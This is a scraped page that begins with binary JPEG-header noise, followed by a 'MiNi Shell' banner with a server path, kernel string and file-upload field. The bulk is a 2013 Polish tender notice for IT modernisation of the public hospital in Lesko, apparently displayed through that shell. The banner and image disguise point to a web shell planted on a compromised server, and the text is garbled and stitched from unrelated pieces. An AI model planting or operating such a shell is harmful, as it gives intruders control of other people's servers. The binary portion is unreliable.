JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130114/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130114/8079-N-2013.html

<p class="kh_header"><b>Lesko: Kompleksowa informatyzacja Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Lesku jako element Podkarpackiego Systemu Informacji Medycznej - PSIM</b><br>
<b>Numer ogłoszenia: 8079 - 2013; data zamieszczenia: 14.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej , ul. Kazimierza Wielkiego 4, 38-600 Lesko, woj. podkarpackie, tel. 13 4696408 w. 14, faks 13 4696408.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozlesko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa informatyzacja Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Lesku jako element Podkarpackiego Systemu Informacji Medycznej - PSIM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia na ZADANIE nr  1.Modernizacja sieci komputerowej w obiektach Szpitala Powiatowego SPZOZ Lesko przy ul. Kochanowskiego 2 wraz z dostosowaniem wydzielonego pomieszczenia na serwerownię obejmująca :  Wykonanie instalacji wg sporządzonego projektu okablowania strukturalnego (urządzenia pasywne). Adaptację wyznaczonego pomieszczenie na serwerownię, wraz z instalacją klimatyzacji 
oraz zasilaniem awaryjnym UPS. Dostarczeniem, instalacją i konfiguracją urządzeń aktywnych.
Przedmiot zamówienia na ZADANIE nr 2. Sprzęt komputerowy wraz z konfiguracją i wdrożeniem, serwery z infrastrukturą pomocniczą  Serwery główne - 2 szt.,Pamięć masowa - 1 szt.,Serwer pomocniczy do backupu - 1szt.Biblioteka taśmowa  LTO-4  archiwizowania - 1 szt.Oprogramowanie systemowe dla serwerów - 3 lic.,
Oprogramowanie do wirtualizacji serwerów - 1 lic.,Oprogramowanie do backupu - 1 lic., szczegóły parametrowo techniczne zawiera siwz
Przedmiot zamówienia na ZADANIE nr 3.  stacje robocze  komputery, monitory LCD, oprogramowanie systemowe, antywirusy - 85 szt., stacja komputerowa oprogramowanie systemowe, antywirus - 1 szt., urządzenia wielofunkcyjne dla użytkowników drukarek laserowych sieciowych z opcją skanowania - 20 szt.,
urządzenia wielofunkcyjne dla użytkowników (drukarek laserowych sieciowych z opcją skanowania) - 31 szt.,urządzenia wielofunkcyjne dla archiwizacji dokumentacji medycznej 1 drukarka z opcją skanowania - 1 szt., Infomat w ilości - 1 szt. 
 - szczegóły parametrowo - techniczne zawiera siwz.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 32.42.80.00-9, 48.82.00.00-2, 30.21.40.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZADANIE nr 1 - 6 000,00 zł (słownie: sześć tysiące złotych 00/100)
ZADANIE nr 2 - 6 000,00 zł (słownie: sześć tysiące złotych 00/100)
ZADANIE nr 3 - 6 000,00 zł (słownie: sześć tysiące złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku na ZADANIE nr 1 Wykonawca oświadczy że posiada:
-  aktualny dokument/certyfikat potwierdzający uprawnienia instalatora okablowania strukturalnego do instalacji okablowania w systemach objętych minimum 20 letnią gwarancją uzyskaną bezpośrednio u producenta okablowania,
- aktualny dokument potwierdzający uprawnienia do wykonywania instalacji w specjalności dla sieci komputerowych i urządzeń elektrycznych ,
- aktualny dokument potwierdzający uprawnienia do wykonywania prac remontowo-adaptacyjnych Na potwierdzenie Wykonawca składa oświadczenie według - Zał. nr 9
Ocena spełniania warunku dokonana będzie metodą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>odpowiednio dla ZADANIA nr 1: wykazać dwie roboty budowlane tożsame z przedmiotem zamówienia wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz w celu potwierdzenia spełnienia powyższego warunku Wykonawca zobowiązany jest do przedstawienia, że wykonał co najmniej dwie roboty budowlane odpowiadające swoim rodzajem robotom, stanowiącym przedmiot niniejszego zamówienia tj. pod tym pojęciem należy rozumieć robotę o wartości co najmniej 200.000.00 zł brutto- każda, polegającej na budowie, rozbudowie lub modernizacji sieci komputerowej, serwerowni wraz z zasilaniem awaryjnym i klimatyzacją, której realizacja została już zakończona, z potwierdzeniem od poprzednich zamawiających, że roboty te zostały wykonane należycie. Wobec czego Wykonawca załączy minimum dwie referencje od poprzednich Zamawiających - według zał. nr 6 Ocena powyższego warunek udziału w  postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę i nastąpi na zasadzie spełnia - nie spełnia.
odpowiednio dla ZADANIA nr 2: wykazać co najmniej dwie dostawy sprzętu komputerowego w tym: serwery, pamięci masowe, biblioteki taśmowe LTO-4 i wdrożył systemy do wirtualizacji  serwerów w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości, przedmiotu, daty wykonania i odbiorców, załączając dokument potwierdzający należyte wykonanie dostawy o wartości co najmniej: 200 000,00 PLN brutto - każda. Wobec czego Wykonawca załączy minimum dwie referencje od poprzednich Zamawiających  - według zał. nr 7 Ocena powyższego warunku udziału w  postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez
wykonawcę i nastąpi na zasadzie spełnia - nie spełnia.
odpowiednio dla ZADANIE nr 3:wykazać co najmniej dwie dostawy sprzętu komputerowego w tym: komputery, drukarki laserowe, skanery, infomatu w okresie ostatnich trzech lat przed upływem terminu  składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości, przedmiotu, daty wykonania i odbiorców, załączając dokument potwierdzający należyte  wykonanie dostawy o wartości co najmniej: 200 000,00 PLN  brutto - każda. Wobec czego Wykonawca załączy minimum dwie referencje od poprzednich Zamawiających  - według zał. nr 8
Ocena powyższego warunku udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę i nastąpi na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wraz z ofertą każdy z Wykonawców składa oświadczenie potwierdzające, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania na załączonym do  niniejszej SIWZ formularzu - Zał. nr 2 do SIWZ, stanowiącym integralna jej cześć
Ocena spełniania warunku dokonana będzie metodą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna za spełnienie tego warunku gdy wykaże dla ZADANIA nr 1  : 
a. Wykonawca winien dysponować 1-osobą nadzorującą prace instalatorskie, która powinna posiadać kwalifikacje w zakresie: 1. instalacji, 2. pomiarów, 3. nadzoru, 4. wykrywania oraz eliminacji uszkodzeń.  Dopuszcza się łączenie powyższych funkcji. Wykonawca załączy do oferty oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeśli ustawy nakładają obowiązek posiadania takich uprawnień. 
b. dysponują co najmniej jedną osobą posiadającą uprawnienia producenta do projektowania oraz certyfikowania sieci strukturalnej i co najmniej jednego pracownika posiadającego uprawnienia  producenta do instalacji sieci strukturalnej 
zainstalowanego systemu min. z 20-letnią gwarancją systemową producenta.
Ocena spełnienia warunku zostanie dokonana na podstawie załączonego oświadczenia o spełnieniu tego warunku oraz wykazu osób według wzoru zał. 9 załączonego do SIWZ oraz wykazu Zał nr 10.
           Ocena spełniania warunku dokonana będzie metodą spełnia - nie spełnia.
2. Zamawiający uzna za spełnienie warunku posiadania osób do wykonania zamówienia dla ZADAŃ nr 2 i nr 3 Ocena spełnienia warunku zostanie dokonana na podstawie załączonego oświadczenia o spełnieniu tego warunku 
zgodnie z art. 22 uPZP. stanowiącego zał. 2 do siwz
Ocena spełniania warunku dokonana będzie metodą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę nie mniejszą niż wartość ceny złożonej oferty dla ZADANIA nr 1,Wykonawca składa oświadczenie, że na dzień podpisania umowy złoży stosowny dokument.
Ocena spełniania warunku dokonana będzie metodą spełnia - nie spełnia.
Ocena spełnienia warunku na ZADANIE nr 2 i nr 3 zostanie dokonana na podstawie załączonego oświadczenia o spełnieniu tego warunku zgodnie z art. 22 uPZP zał. nr 2
b. posiada środki finansowe w wysokości co najmniej 200 000,00 zł dla każdego ZADANIA lub zdolność kredytową w wysokości  200 000,00 zł dla każdego ZADANIA.
Wykonawcy załączają odpowiednie dokumenty na ZADANIE nr 1, nr 2 i nr 3. 
Ocena spełniania warunku dokonana będzie metodą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Wypełniony i podpisany formularz  ofertowy- zał. nr 1 wraz z potwierdzeniem parametrów technicznych oferowanych urządzeń i kosztorysem inwestorskim dla ZADANIA nr 1 do siwz, dowód wniesienia wadium
- wykaz części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom - jeżeli dotyczy
- parafowany projekt umowy według załączników odpowiednich dla wybranego ZADANIA
- pełnomocnictwo do podpisania oferty, o ile upoważnienie nie wynika z dokumentów złożonych wraz z ofertą  
- w formie oryginału lub kopii poświadczonej notarialnie .
- pełnomocnictwo zgodnie z art. 23 ust. 2 ustawy prawo zamówień publicznych w przypadku składania oferty przez wykonawców  ubiegających się wspólnie o udzielenie zamówienia.
- pisemne zobowiązanie podmiotu trzeciego do oddania Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - dotyczy sytuacji, gdy Wykonawca powołuje się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza następujące zmiany w umowie: zmiany przepisów podatkowych w zakresie zmiany stawki podatku VAT. W przypadku wprowadzenia zmiany stawki podatku VAT, zmianie ulegnie wysokość wynagrodzenia netto wchodzącego w skład łącznego wynagrodzenia brutto;
-wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy - w zakresie dostosowania postanowień umowy do zmiany przepisów prawa;
- zmiany przedmiotu umowy w szczególności ze względów organizacyjnych, technologicznych, osobowych lub gdy konieczne będą oszczędności środków publicznych - w zakresie sposobu realizacji przedmiotu umowy lub zmniejszenia wynagrodzenia maksymalnie o 20 % jego wartości brutto;
- opóźnień w realizacji projektu - w zakresie zmian w terminach Umowy, o ile zmiana taka jest korzystna dla Zamawiającego lub jest konieczna w celu prawidłowej realizacji projektu;
- zmiany nazwy oraz formy prawnej Stron - w zakresie dostosowania umowy do tych zmian;
- wystąpienia siły wyższej (Siła wyższa - zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od Stron, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których Strony nie mogły przewidzieć i którym nie mogły zapobiec ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych) - w zakresie dostosowania umowy do tych zmian.
- wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony - w zakresie dostosowania umowy do tych zmian.
- zmiany terminu wykonania zamówienia skrócenie wydłużenie lub terminów płatności, wstrzymaniem/przerwaniem wykonania projektu z przyczyn zależnych od Zamawiającego lub będących następstwem zaistnienia siły wyższej, - w zakresie dostosowania umowy do tych zmian. - zmiany, o których mowa powyżej nie mogą spowodować zwiększenia wartości wynagrodzenia brutto, o którym mowa w ofercie
umowie. - zmiany w zakresie danych identyfikujących Strony umowy, takich jak np. firma, adres, rachunek bankowy, osoby upoważnione do kontaktów odbioru lub inne zapisy dotyczące wskazania Stron, - numeru katalogowego produktu, nazwy produktu przy zachowaniu jego parametrów,  przedmiotowym,  produkt zamienny,
sposobu konfekcjonowania, liczby opakowań w sytuacji gdy: - wprowadzony zostanie do sprzedaży przez wykonawcę produkt zmodyfikowany , udoskonalony 
